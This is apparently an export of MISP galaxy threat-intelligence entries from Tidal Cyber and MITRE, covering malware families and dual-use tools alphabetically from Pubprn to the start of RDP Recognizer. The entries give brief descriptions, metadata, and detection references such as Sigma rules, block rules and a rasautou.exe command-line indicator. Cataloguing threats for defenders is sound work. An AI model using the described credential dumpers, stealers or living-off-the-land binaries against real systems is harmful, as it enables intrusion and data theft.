Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_pubprn.yml[Pubprn.vbs - LOLBAS Project]
Internal MISP references
UUID 58883c83-d5be-42fc-b4bd-9287e55cd499
which can be used as unique global reference for Pubprn
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5260 |
source | Tidal Cyber |
tags | ['8177e8ac-f80d-477d-b0af-c2ea243ddf00', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PULSECHECK
PULSECHECK is a web shell written in Perl that was used by APT5 as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) companies.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID d777204c-f93c-54d9-b80e-41641a3d55ce
which can be used as unique global reference for PULSECHECK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1108 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pulseway
According to joint Cybersecurity Advisory AA23-320A (November 2023), Pulseway is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID 74eb97b8-fc2c-41f0-b497-aad08a52777e
which can be used as unique global reference for Pulseway
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5068 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PUNCHBUGGY
PUNCHBUGGY is a backdoor malware used by FIN8 that has been observed targeting POS networks in the hospitality industry. [Morphisec ShellTea June 2019][FireEye Fin8 May 2016] [FireEye Know Your Enemy FIN8 Aug 2016]
Internal MISP references
UUID d8999d60-3818-4d75-8756-8a55531254d8
which can be used as unique global reference for PUNCHBUGGY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0196 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PUNCHTRACK
PUNCHTRACK is non-persistent point of sale (POS) system malware utilized by FIN8 to scrape payment card data. [FireEye Fin8 May 2016] [FireEye Know Your Enemy FIN8 Aug 2016]
Internal MISP references
UUID 1638d99b-fbcf-40ec-ac48-802ce5be520a
which can be used as unique global reference for PUNCHTRACK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0197 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pupy
Pupy is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. [GitHub Pupy] It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). [GitHub Pupy] Pupy is publicly available on GitHub. [GitHub Pupy]
Internal MISP references
UUID 0a8bedc2-b404-4a9a-b4f5-ff90ff8294be
which can be used as unique global reference for Pupy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Android', 'Windows'] |
software_attack_id | S0192 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PureCrypter
PureCrypter is a malware used for downloading/dropping purposes.
Internal MISP references
UUID a381cec1-9e87-415e-9025-a6e31fc8a48d
which can be used as unique global reference for PureCrypter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5291 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
PuTTy
PuTTy is an open-source SSH and telnet client.[PuTTY Download Page]
Internal MISP references
UUID 313c78e9-488d-4fbc-a6e5-05c0df3cb8a4
which can be used as unique global reference for PuTTy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5065 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
pwdump
pwdump is a credential dumper. [Wikipedia pwdump]
Internal MISP references
UUID 77f629db-d971-49d8-8b73-c7c779b7de3e
which can be used as unique global reference for pwdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0006 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PyDCrypt
PyDCrypt is malware written in Python designed to deliver DCSrv. It has been used by Moses Staff since at least September 2021, with each sample tailored for its intended victim organization.[Checkpoint MosesStaff Nov 2021]
Internal MISP references
UUID 51b2c56e-7d64-4e15-b1bd-45a980c9c44d
which can be used as unique global reference for PyDCrypt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1032 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pysa
Pysa is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.[CERT-FR PYSA April 2020]
Internal MISP references
UUID e0d5ecce-eca0-4f01-afcc-0c8e92323016
which can be used as unique global reference for Pysa
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0583 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
QakBot
QakBot is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. QakBot is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably ProLock and Egregor.[Trend Micro Qakbot December 2020][Red Canary Qbot][Kaspersky QakBot September 2021][ATT QakBot April 2021]
Internal MISP references
UUID 9050b418-5ffd-481a-a30d-f9059b0871ea
which can be used as unique global reference for QakBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0650 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', '15787198-6c8b-4f79-bf50-258d55072fee', 'e096f0dd-fa2c-4771-8270-128c97c09f5b', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Qilin Ransomware
Qilin (also known as Agenda) is a ransomware discovered in 2022. Attacks by threat actors deploying Qilin increased considerably in Q1 2024, impacting organizations in a wide range of sectors and locations across the globe.[Trend Micro March 26 2024]
The ransomware's capabilities have evolved over time, and multiple Qilin/Agenda variants and versions have been observed. The techniques featured in this object mainly derive from a variant observed in February 2024 written in the Rust programming language. A variant focused on encrypting Linux-based virtual machine servers can be found in the separate "Qilin Ransomware (Linux)" Software object.
Internal MISP references
UUID 3b78dda9-d273-4ffc-9a9f-75e80178c7b2
which can be used as unique global reference for Qilin Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'Windows'] |
software_attack_id | S5326 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Qilin Ransomware (Linux)
Qilin is a Linux-based ransomware. The malware is technically capable of running on Linux, FreeBSD, and VMware ESXi servers, but researchers have most often observed Qilin being used to encrypt virtual machines. Qilin users can use various flags to customize its capabilities. Qilin operators maintain a website where they threaten to leak data exfiltrated during their attacks, in an attempt to pressure victims into paying a ransom.[BleepingComputer 12 3 2023]
Internal MISP references
UUID 01a33c16-7eb3-4494-8c05-b163f871b951
which can be used as unique global reference for Qilin Ransomware (Linux)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux'] |
software_attack_id | S5310 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
QUADAGENT
QUADAGENT is a PowerShell backdoor used by OilRig. [Unit 42 QUADAGENT July 2018]
Internal MISP references
UUID 2bf68242-1dbd-405b-ac35-330eda887081
which can be used as unique global reference for QUADAGENT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0269 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
QuasarRAT
QuasarRAT is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. QuasarRAT is developed in the C# language.[GitHub QuasarRAT][Volexity Patchwork June 2018]
Internal MISP references
UUID 4bab7c2b-5ec4-467e-8df4-f2e6996e136b
which can be used as unique global reference for QuasarRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0262 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Quick Assist
Quick Assist is a built-in Windows utility that can be used to grant external users remote access to a particular system. Financially motivated adversaries abused Quick Assist during an April 2024 campaign that in some cases led to Black Basta ransomware deployment.[Microsoft Security Blog 5 15 2024]
Internal MISP references
UUID 9c4f3f26-c391-4b2c-9dd4-e4bb9bbc5ea3
which can be used as unique global reference for Quick Assist
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5319 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
QUIETCANARY
QUIETCANARY is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID 52d3515c-5184-5257-bf24-56adccb4cccd
which can be used as unique global reference for QUIETCANARY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1076 |
source | MITRE |
type | ['malware'] |
QUIETEXIT
QUIETEXIT is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by APT29 since at least 2021. APT29 has deployed QUIETEXIT on opaque network appliances that typically don't support antivirus or endpoint detection and response tools within a victim environment.[Mandiant APT29 Eye Spy Email Nov 22]
Internal MISP references
UUID 947ab087-7550-577f-9ae9-5e82e9910610
which can be used as unique global reference for QUIETEXIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1084 |
source | MITRE |
tags | ['33d35d5e-f0cf-4c66-9be3-a3ffe6610b1a'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
QuietSieve
QuietSieve is an information stealer that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]
Internal MISP references
UUID dcdb74c5-4445-49bd-9f9c-236a7ecc7904
which can be used as unique global reference for QuietSieve
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0686 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Quser
According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is "a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 7b78eb31-f251-493b-8058-14a3452e8ccc
which can be used as unique global reference for Quser
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5053 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Raccoon Stealer 2.0
Raccoon Stealer is one of the most heavily used information & credential stealers (""infostealers"") in recent years. The ""2.0"" version of Raccoon Stealer was observed in mid-2022, featuring new capabilities designed to improve its stealth.[Sekoia.io Raccoon Stealer June 28 2022] Raccoon Stealer is licensed as a service, and like many other modern infostealer families, the relatively low cost of a Raccoon Stealer subscription (around $75 for weeklong access) contributes to the malware's popularity. Victim credentials acquired via Raccoon Stealer are often resold on illicit, automated marketplaces on the dark web.
More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).
Internal MISP references
UUID 7046193b-96c2-462b-9ba1-ea39a938e8e9
which can be used as unique global reference for Raccoon Stealer 2.0
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5070 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Radmin
Radmin is a free remote desktop software application. It has been abused by cyber threat actors such as Akira ransomware operators to facilitate remote access into victim networks.[Sophos Akira May 9 2023]
Internal MISP references
UUID 33c0f985-3e1e-4901-bfee-d3c81bba0d71
which can be used as unique global reference for Radmin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5281 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ragnar Locker
Ragnar Locker is a ransomware that has been in use since at least December 2019.[Sophos Ragnar May 2020][Cynet Ragnar Apr 2020]
Internal MISP references
UUID d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f
which can be used as unique global reference for Ragnar Locker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0481 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', 'cb5803f0-8ab4-4ada-8540-7758dfc126e2', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Raindrop
Raindrop is a loader used by APT29 that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was discovered in January 2021 and was likely used since at least May 2020.[Symantec RAINDROP January 2021][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID 80295aeb-59e3-4c5d-ac39-9879158f8d23
which can be used as unique global reference for Raindrop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0565 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RainyDay
RainyDay is a backdoor tool that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]
Internal MISP references
UUID 42b775bd-0c1d-4ad3-8f7f-cbb0ba84e19e
which can be used as unique global reference for RainyDay
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0629 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ramsay
Ramsay is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between Ramsay and the Darkhotel-associated Retro malware.[Eset Ramsay May 2020][Antiy CERT Ramsay April 2020]
Internal MISP references
UUID dc307b3c-9bc5-4624-b0bc-4807fa1fc57b
which can be used as unique global reference for Ramsay
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0458 |
source | MITRE |
type | ['malware'] |
RansomHub (Payload)
This object represents the techniques associated with the payload binary used in attacks associated with the RansomHub ransomware-as-a-service ("RaaS") operation. The RansomHub gang is suspected of leaking victim data exfiltrated in attacks by other groups, but researchers have also observed an apparent original ransomware payload linked to the group.[BroadcomSW June 5 2024][The Record RansomHub June 3 2024] This payload displays a high degree of code similarity with Knight ransomware, whose source code was offered for sale in cybercriminal forums in February 2024.[BroadcomSW June 5 2024]
Internal MISP references
UUID a3044fb5-3aae-4590-b589-cc88bf0d1f34
which can be used as unique global reference for RansomHub (Payload)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5325 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
RAPIDPULSE
RAPIDPULSE is a web shell that exists as a modification to a legitimate Pulse Secure file that has been used by APT5 since at least 2021.[Mandiant Pulse Secure Update May 2021]
Internal MISP references
UUID 129abb68-7992-554e-92fa-fa376279c0b6
which can be used as unique global reference for RAPIDPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1113 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RARSTONE
RARSTONE is malware used by the Naikon group that has some characteristics similar to PlugX. [Aquino RARSTONE]
Internal MISP references
UUID a9c9fda8-c156-44f2-bc7e-1b696f3fbaa2
which can be used as unique global reference for RARSTONE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0055 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rasautou
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Remote Access Dialer
Author: Tony Lambert
Paths: * C:\Windows\System32\rasautou.exe
Resources: * https://github.com/fireeye/DueDLLigence * https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Detection: * Sigma: win_rasautou_dll_execution.yml * IOC: rasautou.exe command line containing -d and -p[Rasautou.exe - LOLBAS Project]
Internal MISP references
UUID 8d34715e-1018-40fc-bf09-4eca69be830e
which can be used as unique global reference for Rasautou
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5146 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Raspberry Robin
A highly active worm that spreads through removable media devices and abuses built-in Windows utilities after initial infection of the host. Raspberry Robin has evolved into a major malware delivery threat, with links to infections involving Cobalt Strike, SocGholish, Truebot, and ultimately ransomware.[Microsoft Security Raspberry Robin October 2022]
Delivers: Cobalt Strike[Microsoft Security Raspberry Robin October 2022], SocGholish[Microsoft Security Raspberry Robin October 2022], Truebot[Microsoft Security Raspberry Robin October 2022][U.S. CISA Increased Truebot Activity July 6 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/raspberryrobin/
PulseDive (IOCs): https://pulsedive.com/threat/Raspberry%20Robin
Internal MISP references
UUID dc0dbd15-0916-43c7-a3b9-6dc3ce0771be
which can be used as unique global reference for Raspberry Robin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5002 |
source | Tidal Cyber |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RATANKBA
RATANKBA is a remote controller tool used by Lazarus Group. RATANKBA has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. RATANKBA has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. [Lazarus RATANKBA] [RATANKBA]
Internal MISP references
UUID 40466d7d-a107-46aa-a6fc-180e0eef2c6b
which can be used as unique global reference for RATANKBA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0241 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RawDisk
RawDisk is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.[EldoS RawDisk ITpro][Novetta Blockbuster Destructive Malware]
Internal MISP references
UUID d86a562d-d235-4481-9a3f-273fa3ebe89a
which can be used as unique global reference for RawDisk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0364 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RawPOS
RawPOS is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. [Kroll RawPOS Jan 2017] [TrendMicro RawPOS April 2015] [Visa RawPOS March 2015] FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. [Mandiant FIN5 GrrCON Oct 2016] [DarkReading FireEye FIN5 Oct 2015]
Internal MISP references
UUID 6ea1bf95-fed8-4b94-8071-aa19a3af5e34
which can be used as unique global reference for RawPOS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0169 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rclone
Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.[Rclone][Rclone Wars][Detecting Rclone][DarkSide Ransomware Gang][DFIR Conti Bazar Nov 2021]
Internal MISP references
UUID 1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4
which can be used as unique global reference for Rclone
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S1040 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a40b7316-bef6-4186-9764-58ce6f033850', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RCSession
RCSession is a backdoor written in C++ that has been in use since at least 2018 by Mustang Panda and by Threat Group-3390 (Type II Backdoor).[Secureworks BRONZE PRESIDENT December 2019][Trend Micro Iron Tiger April 2021][Trend Micro DRBControl February 2020]
Internal MISP references
UUID 38c4d208-fe38-4965-871c-709fa1479ba3
which can be used as unique global reference for RCSession
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0662 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
rcsi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Non-Interactive command line inerface included with Visual Studio.
Author: Oddvar Moe
Paths: * no default
Resources: * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
Detection: * Sigma: proc_creation_win_csi_execution.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: proc_creation_win_csi_execution.yml[rcsi.exe - LOLBAS Project]
Internal MISP references
UUID 9a5cff11-6bad-407a-a53c-2562a56ac024
which can be used as unique global reference for rcsi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5233 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RDAT
RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.[Unit42 RDAT July 2020]
Internal MISP references
UUID 567da30e-fd4d-4ec5-a308-bf08788f3bfb
which can be used as unique global reference for RDAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0495 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RDFSNIFFER
RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.[FireEye FIN7 Oct 2019]
Internal MISP references
UUID ca4e973c-da15-46a9-8f3a-0b1560c9a783
which can be used as unique global reference for RDFSNIFFER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0416 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RDP Recognizer
